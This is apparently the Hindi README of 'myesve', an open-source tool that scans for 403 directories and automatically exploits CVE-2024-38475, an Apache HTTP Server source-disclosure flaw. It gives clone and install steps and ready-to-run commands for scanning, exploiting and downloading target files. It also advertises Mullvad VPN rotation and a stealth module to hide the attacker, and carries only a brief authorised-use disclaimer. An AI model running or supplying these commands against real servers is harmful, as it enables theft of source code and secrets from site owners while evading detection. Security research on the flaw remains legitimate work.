
CVE-2024-38475 शोषण और स्कैनिंग टूल, Mullvad VPN रोटेशन के साथ
CVE-2024-38475 शोषण ढांचा – संस्करण 1.0
अस्वीकरण: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण, शैक्षिक अनुसंधान और वैध बग बाउंटी कार्यक्रमों के लिए है। इसका उपयोग उन प्रणालियों के विरुद्ध न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है। लेखक किसी भी दुरुपयोग के लिए कोई दायित्व नहीं मानते हैं।
myesve एक मॉड्यूलर उपकरण है जो CVE-2024-38475 का पता लगाता है और उसका शोषण करता है, जो Apache HTTP Server में एक स्रोत कोड प्रकटीकरण भेद्यता है। यह निर्देशिका स्कैनिंग, मल्टी-थ्रेडेड शोषण, फ़ाइल डाउनलोडिंग और वैकल्पिक Mullvad VPN रोटेशन को जोड़ता है।
मूल खोज Orange Tsai द्वारा।
raft-medium निर्देशिकाएँ और फ़ाइलें शामिल हैं (कोई अतिरिक्त डाउनलोड नहीं)।--vpn या vpn उपकमांड का उपयोग करते हैं। Mullvad से इंस्टॉल करें।git clone https://github.com/Nyakki-Labs-0x420/Myesve.git
cd Myesve
pip install .
myesve कमांड सिस्टम-व्यापी उपलब्ध हो जाता है। वर्डलिस्ट पैकेज के अंदर बंडल की जाती हैं।
pip install -e .
स्रोत कोड में परिवर्तन तुरंत प्रभावी होते हैं।
| Command | Description |
|---|---|
scan | उन निर्देशिकाओं को खोजें जो HTTP 403 लौटाती हैं। |
403 निर्देशिकाओं के लिए स्कैन करें:
myesve scan -t http://target.com -o dirs.txt
मिली निर्देशिकाओं का उपयोग करके शोषण करें:
myesve exploit -t http://target.com --directories-file dirs.txt --download
VPN घुमाएँ और स्थान दिखाएँ:
myesve vpn --rotate --country se
myesve vpn --info
VPN रोटेशन के साथ पूर्ण स्वचालित स्कैन + शोषण:
myesve full -t http://target.com --vpn --vpn-rotate-before --download
सभी विकल्पों के लिए, अंतर्निहित सहायता देखें:
myesve --help
myesve scan --help
myesve exploit --help
myesve vpn --help
myesve full --help
myesve/
├── myesve/
│ ├── __init__.py
│ ├── banner.py
│ ├── cli.py
│ ├── scanner.py
│ ├── exploiter.py
│ ├── vpn.py
│ ├── utils.py
│ ├── user_agents.py
│ ├── stealth.py
│ ├── output.py
│ ├── logger.py (may be deprecated)
│ ├── recon.py
│ └── wordlists/
│ ├── raft-medium-directories.txt
│ └── raft-medium-files.txt
├── pyproject.toml
├── README.md
├── DOCUMENTATION.md
└── LICENSE
GNU Affero सामान्य सार्वजनिक लाइसेंस v3.0 (AGPLv3)। LICENSE देखें।
समस्याएँ और पुल रिक्वेस्ट का स्वागत है। कृपया किसी भी महत्वपूर्ण बदलाव पर चर्चा करने के लिए पहले एक मुद्दा खोलें।
exploit| 403 निर्देशिकाओं का उपयोग करके स्रोत प्रकटीकरण का प्रयास करें। |
vpn | Mullvad VPN नियंत्रित करें (स्थिति, रोटेशन, भू-स्थान, ट्रेसरूट)। |
full | स्कैन + शोषण एक साथ चलाएँ, वैकल्पिक रूप से VPN रोटेशन के साथ। |